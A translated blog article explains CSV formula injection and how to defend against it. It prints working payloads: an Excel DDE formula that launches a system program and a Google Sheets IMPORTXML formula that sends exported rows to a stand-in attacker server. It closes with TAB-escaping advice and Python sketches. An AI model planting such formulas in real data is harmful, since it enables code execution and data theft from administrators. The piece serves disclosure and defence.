• The Absurdly Underestimated Dangers of CSV Injection
  • Originally written by georgemauer
  • The Nuggets translation Project
  • Permanent link to this article: github.com/xitu/gold-m…
  • Translator: mnikn
  • Proofreader: YCT21, CACppuccino

CSV Injection: A Greatly Underestimated Risk

I have been presenting this problem at local user groups lately and was asked to write it up.

In some ways this is old news, but in other ways... well, I think very few people realize how devastating this problem is and how much damage it can cause. Any application that takes user input and lets administrators export that information in bulk to CSV files has a viable attack vector.

This applies to every such application.

Edit: Credit where it is due. It has been pointed out that a 2014 article by a security professional discusses some of these attack vectors, and so does another one.

Now let’s get down to business. Imagine we have an application that keeps track of time or tickets. Users can enter their own time (or tickets) into the app, but they cannot see other users’ entries. An administrator then exports the entries to a CSV file and opens it in a spreadsheet application. It all looks perfectly normal.

Attack Vector 1

We all know what a CSV file is. The format is simple, and the exported CSV file looks something like this:

    UserId,BillToDate,ProjectName,Description,DurationMinutes
    1,2017-07-25,Test Project,Flipped the jibbet,60
    2,2017-07-25,Important Client,"Bop, dop, and giglip", 240

Simple enough. There’s nothing dangerous in there. Even the RFC puts it this way:

CSV files contain passive text data that should not pose any risks.

Even by definition, it should be safe.

Wait, let’s try changing the CSV file to the following:

    UserId,BillToDate,ProjectName,Description,DurationMinutes
    1,2017-07-25,Test Project,Flipped the jibbet,60
    2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
    2,2017-07-25,Important Client,"=2+5", 240

[Screenshots: the file opened in Excel (left) and in Google Sheets (right); both evaluate the formula.]

Well, that is weird. Although the cell’s contents are in quotes, the cell is treated as an expression because its first character is =. In fact, at least in Excel, any of the characters =, -, +, and @ triggers this behavior. The usual result is an administrator who finds the data oddly formatted and spends a lot of time working out why (this Excel quirk is what first caught my attention). It’s strange, but it’s not very dangerous, is it?

Wait, an expression is code that gets executed. So a user can execute code, albeit only expression code, on the administrator’s machine, which has access to user data.
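To make the trigger rule concrete, here is a minimal Python sketch that scans CSV text for cells a spreadsheet might evaluate. The names `FORMULA_TRIGGERS`, `looks_like_formula`, and `risky_cells` are made up for this illustration, and the trigger list is simply the four characters mentioned above; other spreadsheet programs may react to more.

```python
import csv
import io

# The four leading characters named in the article (assumed complete for this sketch).
FORMULA_TRIGGERS = ("=", "-", "+", "@")


def looks_like_formula(cell: str) -> bool:
    """Return True if a spreadsheet is likely to treat this cell as an expression."""
    return cell.startswith(FORMULA_TRIGGERS)


def risky_cells(csv_text: str):
    """Yield (row_number, column_number, value) for every suspicious cell."""
    reader = csv.reader(io.StringIO(csv_text), skipinitialspace=True)
    for row_number, row in enumerate(reader, start=1):
        for column_number, cell in enumerate(row, start=1):
            if looks_like_formula(cell):
                yield row_number, column_number, cell


sample = (
    "UserId,BillToDate,ProjectName,Description,DurationMinutes\n"
    "1,2017-07-25,Test Project,Flipped the jibbet,60\n"
    '2,2017-07-25,Important Client,"Bop, dop, and giglip", 240\n'
    '2,2017-07-25,Important Client,"=2+5", 240\n'
)

# The CSV parser strips the quotes, so the quoted cell still starts with "=".
print(list(risky_cells(sample)))  # [(4, 4, '=2+5')]
```

Note that a check like this also flags harmless values such as negative numbers, so it is better suited to auditing an export than to rejecting input outright.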

What happens if we change the CSV file to this? (Note the Description column in the last line.)

    UserId,BillToDate,ProjectName,Description,DurationMinutes
    1,2017-07-25,Test Project,Flipped the jibbet,60
    2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
    2,2017-07-25,Important Client,"=2+5+cmd|' /C calc'!A0", 240

What happens if we open it in Excel?

The calculator will open!

Oh, my God!

That’s right, the system calculator opens right up.

To be fair, there was a warning beforehand. It’s just that the warning is a big block of text, and no one wants to read it. Even if someone wants to read it, it explicitly advises:

Click OK only if you trust the workbook’s data

And you know what? This file is an export from an application the administrators themselves use. Of course they trust the data!

What if they are technically savvy? Then it is even worse. They know that the CSV format is only text data and therefore cannot do any harm. They are quite sure of it.

Just like that, an attacker has free rein to download a keylogger, install things, and execute arbitrary code remotely on someone else’s computer, and if that computer belongs to a manager or a company administrator, quite possibly to reach every user’s data. I wonder what other files on that computer could be stolen?

Attack Vector 2

Okay, the above is neat, but it is after all a (relatively) well-known vulnerability. As a security professional, you have probably warned all your administrators to be careful with Excel, or perhaps told them to use Google Sheets instead. After all, Sheets can’t be affected by macros, right?

That’s absolutely true. So let’s scale back our ambition to “run anything” and focus on just stealing data. After all, the premise here is that the attacker is an ordinary user who can only access the data he has entered into the system himself, while an administrator can see every user’s data. Is there any way we can take advantage of that?

Come to think of it, we can’t run macros in Google Sheets, but we can run expressions, and expressions are not limited to simple arithmetic. So I wondered: is there a Google Sheets function available in formulas that lets us send data somewhere else? The answer is yes, and there are many ways to do it. Let’s focus first on one of them, IMPORTXML.

IMPORTXML(url, xpath_query)

When this function runs, it makes an HTTP GET request to the given URL, then attempts to parse the response and insert the returned data into our spreadsheet. Starting to see where this is going?

If our CSV file has the following content:

    UserId,BillToDate,ProjectName,Description,DurationMinutes
    1,2017-07-25,Test Project,Flipped the jibbet,60
    2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
    2,2017-07-25,Important Client,"=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")", 240

The attacker starts the cell with the = character and points IMPORTXML at a server the attacker controls, appending spreadsheet data to the URL as a query string. Now the attacker can open the server log and voilà: data that does not belong to them. Try it yourself on Requestb.in.

And the telltale signs? There are none: no warnings, no pop-ups, no reason to think anything is wrong. The attacker simply submits a specially formatted time/ticket/other entry, and when the administrator eventually opens the exported CSV file, all of that restricted data is transmitted instantly and silently.
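As a rough illustration of what ends up in that server log, the Python sketch below mimics the string handling of the formula: CONCATENATE(A2:E2) joins the five cells of spreadsheet row 2, and CONCAT appends the result to the URL. The function name `requested_url` is invented for this example, the row values are sample data, and the sketch ignores any URL encoding the spreadsheet may apply before sending the request.

```python
# Placeholder host taken from the example payload; it is not a real server.
BASE_URL = "http://some-server-with-log.evil?v="


def requested_url(row_cells) -> str:
    """Model CONCAT(url, CONCATENATE(A2:E2)): join the cells, append them to the URL."""
    return BASE_URL + "".join(str(cell) for cell in row_cells)


# Spreadsheet row 2 is the first data row of the export (row 1 is the header).
row_2 = ["1", "2017-07-25", "Test Project", "Flipped the jibbet", "60"]

print(requested_url(row_2))
# http://some-server-with-log.evil?v=12017-07-25Test ProjectFlipped the jibbet60
```

The point is only that another user's row travels out as part of an ordinary GET request, which is why nothing looks unusual on the administrator's side.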

Wait a minute. We can do worse than that.

The formula runs in the administrator’s browser, under the administrator’s user account and security context. And Google Sheets is not limited to data from the current spreadsheet; it can pull data from other spreadsheets too, as long as the user has access to them. The attacker only needs to know the IDs of those other spreadsheets. That information is usually not treated as secret: it appears in the spreadsheet’s URL, it often turns up in emails, and it gets posted in internal company documents, on the assumption that Google’s security policies ensure only authorized users can access the data.

So it’s not just your exported time/ticket/other data that can slip out. Does your administrator have access to spreadsheets with customer lists or payroll information? Then maybe that information can get out too! It all happens silently, and no one will ever know. Yikes!

Of course, the same trick works perfectly well in Excel. In fact, Excel is the poster child for this: it has been used by the police to track criminals.

But it doesn’t have to work that way.

I showed this to a number of security researchers, who pointed out various other nefarious uses. Criminals, for example, can embed beacons to their own servers in their communications. That way, if investigators are secretly reviewing those communications in a spreadsheet, the beacon fires and tips off the criminals that someone is eavesdropping on them.

This is far from ideal.

Prevention

So whose fault is all this?

It’s not the CSV format’s fault, of course. The format itself never says that anything that “looks like a formula” should be executed automatically; that is not an intended use. The bug lies in popular spreadsheet programs that are, frankly, doing the wrong thing. Of course, Google Sheets has to match Excel’s capabilities, and Excel has to support the millions of complex spreadsheets that already exist. Also, though I won’t go into it here, there is good reason to believe that Excel’s behavior stems from the strange processing of ancient Lotus 1-2-3. Getting every spreadsheet program to change this behavior now is a steep hill to climb. I think it is everyone else who has to change.

I reported this to Google as a bug in their spreadsheet program. They acknowledged it, but said they were already aware of the problem. While I’m sure they understood that this was a bug, they gave me the distinct impression that they hadn’t really thought through the potential for abuse in practice. At the very least, Google Sheets should issue a warning when a CSV import is about to generate external requests.

But putting the blame on the app developer isn’t practical either. After all, most developers have no reason to suspect this problem after writing an export feature in a simple business application. In fact, even if they read the damn RFC, they still wouldn’t have any clues to the problem.

So how do you prevent this?

Well, while StackOverflow and other sites offer a wealth of advice, I’ve found only one (undocumented) method that works in any spreadsheet program:

For any cell that begins with one of the expression trigger characters =, -, +, or @, prefix the cell’s contents with a TAB character. Note that if the contents of the cell are in quotes, the TAB goes inside the quotes. In the last row below, the TAB sits between the opening quote and the = sign:

    UserId,BillToDate,ProjectName,Description,DurationMinutes
    1,2017-07-25,Test Project,Flipped the jibbet,60
    2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
    2,2017-07-25,Important Client,"	=2+5", 240

It’s weird, but it works, and TAB characters don’t show up in Excel or Google Sheets. So that’s what we want, right?
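The TAB rule can be sketched as a small Python helper. The name `escape_cell` and the trigger list are assumptions made for this illustration, not part of any library; the helper only covers the four characters listed above.

```python
# The four leading characters named in the article (assumed complete for this sketch).
FORMULA_TRIGGERS = ("=", "-", "+", "@")


def escape_cell(value) -> str:
    """Prefix a TAB to any cell that a spreadsheet would treat as an expression."""
    text = str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "\t" + text
    return text


row = ["2", "2017-07-25", "Important Client", "=2+5", 240]
print([escape_cell(cell) for cell in row])
# ['2', '2017-07-25', 'Important Client', '\t=2+5', '240']
```

Escaping the raw value before it is handed to a CSV writer keeps the TAB inside any quotes the writer adds, which matches the note about quoted cells.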

Unfortunately, the story doesn’t end there. The character is not displayed, but it is still there. A quick test of the string length with =LEN(D4) confirms it. So this is an acceptable solution only if the cell values are used purely for display and never consumed by a program. Worse, the extra character creates strange inconsistencies. The CSV format is used to exchange information between applications, which means that escaped cell data exported from one application will be imported by another application as part of the data.
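The same effect is easy to reproduce outside a spreadsheet. In this small Python sketch, `escaped_export` stands in for a file produced by some other application that applied the TAB escape; any program that imports it receives the TAB as part of the value.

```python
import csv
import io

# A stand-in for an export in which the Description cell was TAB-escaped.
escaped_export = 'Description\n"\t=2+5"\n'

rows = list(csv.reader(io.StringIO(escaped_export)))
imported_cell = rows[1][0]

print(repr(imported_cell))  # '\t=2+5'
print(len("=2+5"))          # 4
print(len(imported_cell))   # 5
```

An importer that compares, parses, or stores this value now has to know about the escape, which is exactly the inconsistency described above.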

We ended up with the unfortunate conclusion that when generating a CSV export, you have to know what the export is for.

  • If the export is meant to be viewed by a person in a spreadsheet program, escape it with TAB characters. This is actually the more important case, because you don’t want the string “-2+3” to show up in the spreadsheet as the result “1”, as if it had been interpreted by a programming language.
  • If it is used to communicate data between systems, then do not escape anything.
  • If you don’t know how it will be used, or if it will be both viewed in a spreadsheet and later used as an import source by other software, give up; all you can do is hope nothing bad happens. (Alternatively, always disconnect from the network while working in Excel and heed every security prompt.) (Edit: even that is not 100% safe, as an attacker can still use macros to overwrite known files with their own binaries. Screw it.)
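One way to encode the first two cases is to make the caller state the purpose of the export explicitly. The following is a sketch under that assumption; `ExportPurpose` and `export_csv` are hypothetical names, and the third case (unknown or mixed use) is deliberately left without a default because the article offers no safe answer for it.

```python
import csv
import io
from enum import Enum


class ExportPurpose(Enum):
    SPREADSHEET_VIEWING = "spreadsheet_viewing"  # a person opens the file in a spreadsheet
    SYSTEM_INTERCHANGE = "system_interchange"    # another program parses the file


# The four leading characters named in the article (assumed complete for this sketch).
FORMULA_TRIGGERS = ("=", "-", "+", "@")


def export_csv(rows, purpose: ExportPurpose) -> str:
    """Serialize rows to CSV, TAB-escaping formula-like cells only for human viewing."""
    escape = purpose is ExportPurpose.SPREADSHEET_VIEWING
    buffer = io.StringIO()
    writer = csv.writer(buffer, lineterminator="\n")
    for row in rows:
        cells = [str(cell) for cell in row]
        if escape:
            cells = ["\t" + c if c.startswith(FORMULA_TRIGGERS) else c for c in cells]
        writer.writerow(cells)
    return buffer.getvalue()


rows = [["2", "2017-07-25", "Important Client", "=2+5", 240]]
print(repr(export_csv(rows, ExportPurpose.SYSTEM_INTERCHANGE)))
# '2,2017-07-25,Important Client,=2+5,240\n'
```

Requiring the `purpose` argument forces whoever writes the export feature to decide who the consumer is, instead of discovering the question after the fact.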

It’s a nightmare scenario: people can exploit this hole to do real harm and cost others money, and there is no clear fix. More people need to know about this bug.

